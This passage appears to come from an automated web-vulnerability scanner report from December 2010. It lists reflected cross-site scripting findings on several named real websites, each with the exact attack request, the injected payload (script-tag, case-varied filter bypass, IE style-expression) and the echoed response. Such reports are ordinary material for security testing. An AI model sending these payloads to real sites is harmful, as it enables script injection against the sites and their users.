This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /cm/community/news/sec/blog/facebook-gets-security-help-from-markmonitor/?cs=32258&ac634"><ScRiPt>alert(1)</ScRiPt>de16193bc6d=1 HTTP/1.1 Host: www.itbusinessedge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9e7a"><script>alert(1)</script>aec47416125 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internetb9e7a"><script>alert(1)</script>aec47416125/76983/domain-name-wars-rise-cybersquatters HTTP/1.1 Host: www.itworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:14:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.11 Set-Cookie: SESS7f41de3c122f8e2a2210fde0e7133a0e=fc2cngis6ro1oqta54ljud06b3; expires=Mon, 03-Jan-2011 05:48:02 GMT; path=/; domain=.itworld.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:14:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <link rel="canonical" href="http://www.itworld.com/internetb9e7a"><script>alert(1)</script>aec47416125/76983/domain-name-wars-rise-cybersquatters" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d30f9"><script>alert(1)</script>3a0744ded44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983d30f9"><script>alert(1)</script>3a0744ded44/domain-name-wars-rise-cybersquatters HTTP/1.1 Host: www.itworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:14:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.11 Set-Cookie: SESS7f41de3c122f8e2a2210fde0e7133a0e=vma8tsaac9g6pgpjgkq1836t51; expires=Mon, 03-Jan-2011 05:48:04 GMT; path=/; domain=.itworld.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:14:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <link rel="canonical" href="http://www.itworld.com/internet/76983d30f9"><script>alert(1)</script>3a0744ded44/domain-name-wars-rise-cybersquatters" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d59"><script>alert(1)</script>a830ae3ef9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983/domain-name-wars-rise-cybersquatters98d59"><script>alert(1)</script>a830ae3ef9a HTTP/1.1 Host: www.itworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:14:46 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.11 Set-Cookie: SESS7f41de3c122f8e2a2210fde0e7133a0e=cemi9qfuj8jubr81qbca5fog61; expires=Mon, 03-Jan-2011 05:48:06 GMT; path=/; domain=.itworld.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:14:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <link rel="canonical" href="http://www.itworld.com/internet/76983/domain-name-wars-rise-cybersquatters98d59"><script>alert(1)</script>a830ae3ef9a" /> ...[SNIP]...
1.106. http://www.itworld.com/internet/76983/domain-name-wars-rise-cybersquatters [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90993"><script>alert(1)</script>6bab0eeea38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983/domain-name-wars-rise-cybersquatters?90993"><script>alert(1)</script>6bab0eeea38=1 HTTP/1.1 Host: www.itworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe5b"><script>alert(1)</script>5a1ad4c90f was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /internet/76983/domain-name-wars-rise-cybersquatters?page=0%2C08fe5b"><script>alert(1)</script>5a1ad4c90f HTTP/1.1 Host: www.itworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21f55"style%3d"x%3aexpression(alert(1))"f539bed3a06 was submitted in the REST URL parameter 1. This input was echoed as 21f55"style="x:expression(alert(1))"f539bed3a06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blog21f55"style%3d"x%3aexpression(alert(1))"f539bed3a06/ HTTP/1.1 Host: www.javelinstrategy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:14:41 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: CMSSESSID7da0dc01=ut6vgcok6q2ouq7orm7qrggrd6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.109. http://www.kroll.com/include/document.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kroll.com
Path:
/include/document.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ce68'-alert(1)-'3d970e2e072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /include/document.asp?7ce68'-alert(1)-'3d970e2e072=1 HTTP/1.1 Host: www.kroll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=176843135.1292033507.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=176843135.1231045933.1292033507.1292033507.1292033507.1; __utmc=176843135; ASP.NET_SessionId=cxikg2mjjqt4ug55xh1xo2mm; __utmb=176843135.12.10.1292033507;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:12:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4169 Content-Type: text/html Set-Cookie: ASPSESSIONIDACCQRBRC=FPEMFPLACKMIGCIOMJAELBHJ; path=/ Cache-control: private
1.110. http://www.markmonitor.com/cta/bji-special-edition2010/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/bji-special-edition2010/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d2a"><a>f95df614ad5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/bji-special-edition2010/?c8d2a"><a>f95df614ad5=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:30 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31789 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/bji-special-edition2010/?c8d2a"><a>f95df614ad5=1" id="campaign-form"> ...[SNIP]...
1.111. http://www.markmonitor.com/cta/bji-winter2009/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/bji-winter2009/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67ea8"><a>8ccb119936c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/bji-winter2009/?67ea8"><a>8ccb119936c=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:28 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 32021 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/bji-winter2009/?67ea8"><a>8ccb119936c=1" id="campaign-form"> ...[SNIP]...
1.112. http://www.markmonitor.com/cta/cs-AAA/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/cs-AAA/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a06"><a>08ea581b97d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-AAA/?a3a06"><a>08ea581b97d=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:11 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31993 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/cs-AAA/?a3a06"><a>08ea581b97d=1" id="campaign-form"> ...[SNIP]...
1.113. http://www.markmonitor.com/cta/cs-Deckers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/cs-Deckers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa25"><a>0367222a9dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cta/cs-Deckers/?1aa25"><a>0367222a9dc=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:18 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 32134 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/cs-deckers/?1aa25"><a>0367222a9dc=1" id="campaign-form"> ...[SNIP]...
The value of the Lead_Source_Mktg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79c67"><a>51070ed2d68 was submitted in the Lead_Source_Mktg parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-wwe/?Lead_Source_Mktg=HP79c67"><a>51070ed2d68 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:56:32 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31623 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/cs-wwe/?Lead_Source_Mktg=HP79c67"><a>51070ed2d68" id="campaign-form"> ...[SNIP]...
1.115. http://www.markmonitor.com/cta/cs-wwe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/cs-wwe/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab60"><a>ddf1e94f83d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-wwe/?1ab60"><a>ddf1e94f83d=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:56:51 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31582 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/cs-wwe/?1ab60"><a>ddf1e94f83d=1" id="campaign-form"> ...[SNIP]...
1.116. http://www.markmonitor.com/cta/request/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/request/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 500ea"><a>15de34149db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/request/?500ea"><a>15de34149db=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:26 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31361 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content ...[SNIP]... <form method="post" action="/cta/request/?500ea"><a>15de34149db=1" id="campaign-form"> ...[SNIP]...
1.117. http://www.markmonitor.com/cta/wp-6steps/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/wp-6steps/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c56"><a>d38010cc63a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-6steps/?b2c56"><a>d38010cc63a=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:10 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31984 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-6steps/?b2c56"><a>d38010cc63a=1" id="campaign-form"> ...[SNIP]...
The value of the Lead_Source_Mktg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0859"><a>a9602da5291 was submitted in the Lead_Source_Mktg parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-counterfeit/?Lead_Source_Mktg=HPb0859"><a>a9602da5291 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:57:15 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31725 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-counterfeit/?Lead_Source_Mktg=HPb0859"><a>a9602da5291" id="campaign-form"> ...[SNIP]...
1.119. http://www.markmonitor.com/cta/wp-counterfeit/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/wp-counterfeit/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3ca"><a>ec80de027e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-counterfeit/?cd3ca"><a>ec80de027e4=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:57:36 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31684 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-counterfeit/?cd3ca"><a>ec80de027e4=1" id="campaign-form"> ...[SNIP]...
1.120. http://www.markmonitor.com/cta/wp-paidsearch/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/wp-paidsearch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90057"><a>1b139485ace was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-paidsearch/?90057"><a>1b139485ace=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:19 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 31667 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-paidsearch/?90057"><a>1b139485ace=1" id="campaign-form"> ...[SNIP]...
1.121. http://www.markmonitor.com/cta/wp-protectingbrand/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.markmonitor.com
Path:
/cta/wp-protectingbrand/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 451d4"><a>54700e274a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-protectingbrand/?451d4"><a>54700e274a9=1 HTTP/1.1 Host: www.markmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:10 GMT Server: NOYB X-Powered-By: PHP/5.3.3 Content-Length: 32293 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]... <form method="post" action="/cta/wp-protectingbrand/?451d4"><a>54700e274a9=1" id="campaign-form"> ...[SNIP]...
1.122. https://www.markmonitor.com/cta/bji-winter2009/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www.markmonitor.com
Path:
/cta/bji-winter2009/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f89d"><a>b7bae97518d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
